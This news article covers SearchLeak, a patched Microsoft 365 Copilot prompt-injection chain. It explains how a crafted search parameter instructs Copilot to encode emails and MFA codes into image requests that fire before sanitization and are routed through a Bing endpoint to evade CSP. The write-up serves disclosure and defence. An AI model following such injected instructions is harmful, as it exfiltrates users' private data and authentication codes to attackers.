SearchLeak Let Attackers Steal M365 Emails and MFA Codes in One Click

A vulnerability chain in Microsoft 365 Copilot Enterprise Search allowed attackers to steal emails, calendar data, OneDrive files, and even MFA codes with a single click. Varonis Threat Labs disclosed the flaw, dubbed SearchLeak, which Microsoft patched on the backend before public disclosure.

The vulnerability, tracked as CVE-2026-42824, received a CVSS score of 6.5 from Microsoft (7.5 from NVD) despite the company labeling it critical. The discrepancy reflects the attack's reliance on user interaction—a victim had to click an attacker-crafted link for exploitation. This adds to a series of AI security vulnerabilities affecting enterprise platforms as organizations rush to deploy AI capabilities.

Three-Flaw Chain

SearchLeak chained three distinct weaknesses to achieve data exfiltration:

Parameter-to-Prompt Injection: The q parameter in Copilot Enterprise Search URLs passes directly to the AI as an executable prompt rather than a simple search query. Attackers craft URLs where the search term is actually a malicious instruction telling Copilot to query sensitive data and encode it in an image request.

Timing-Based Sanitizer Bypass: Microsoft's security guardrails wrap AI outputs in <code> blocks to prevent HTML execution, but this processing happens post-generation. Browsers render streamed content immediately, so injected <img> tags fire before sanitization completes. The race condition window is narrow but reliably exploitable.

CSP Bypass via Bing SSRF: The Copilot page's Content Security Policy allowlists *.bing.com. Attackers leverage Bing's image analysis endpoint as an exfiltration proxy—the endpoint performs server-side fetches to attacker-controlled URLs, carrying stolen data encoded in the request parameters while satisfying CSP restrictions.

The combination turns a legitimate Microsoft URL into a data theft weapon. Victims see what appears to be a normal Copilot search page while their indexed enterprise data streams to attacker infrastructure.

What Could Be Stolen

The attack gained access to anything the signed-in user could reach via Microsoft Graph:

• Outlook emails including one-time codes, MFA verification messages, and password-reset links
• Calendar invites and meeting notes
• SharePoint documents accessible to the user
• OneDrive files indexed by Copilot

The MFA code exfiltration is particularly dangerous. Organizations using email-based second factors could have their 2FA bypassed completely—an attacker stealing both credentials and the verification code can complete account takeover in real time.

This risk parallels concerns about AI agents acting on sensitive data that we covered when AutoJack demonstrated how AI assistants could be manipulated through crafted inputs.

Enterprise AI Introduces New Attack Surfaces

SearchLeak exemplifies an emerging vulnerability class where AI interfaces create unexpected security holes. Traditional web applications don't execute user-supplied search terms as instructions, but AI systems inherently blur the line between data and commands.

Microsoft's Copilot integrates deeply with enterprise data through Graph API access. That integration creates value—users can ask natural language questions about their documents and communications—but it also means prompt injection attacks can leverage those same access paths maliciously.

The timing-based sanitization bypass is particularly instructive. Microsoft implemented security controls, but the async nature of streaming AI responses created a window where those controls don't apply. Defense-in-depth assumptions based on traditional request-response models don't hold when responses stream incrementally.

Current Status

Microsoft mitigated the vulnerability on the backend before Varonis published their research. Since Copilot Enterprise runs as a managed service, tenant administrators cannot apply patches manually—the fix deployed automatically.

Organizations should monitor for suspicious Copilot activity patterns regardless. Logs showing unusual search queries, particularly those resembling encoded instructions rather than natural language questions, could indicate attempted exploitation or probing. The Klue Salesforce OAuth breach showed how attackers exploit similar cloud service misconfigurations to access enterprise data.

Broader Implications

SearchLeak joins a growing list of AI-specific vulnerabilities demonstrating that enterprise AI assistants require security models distinct from traditional web applications. The research community has documented prompt injection, jailbreaks, and data exfiltration across every major AI platform.

Microsoft's rapid response—patching before public disclosure—suggests the company takes these issues seriously. But the vulnerability's existence in a production Enterprise feature highlights how quickly AI capabilities deploy relative to security hardening.

Organizations adopting AI assistants should assume similar vulnerabilities exist and implement compensating controls: restrict AI access to sensitive data categories, monitor for anomalous AI-generated requests, and educate users that AI interfaces can be weaponized through social engineering just like any other corporate application.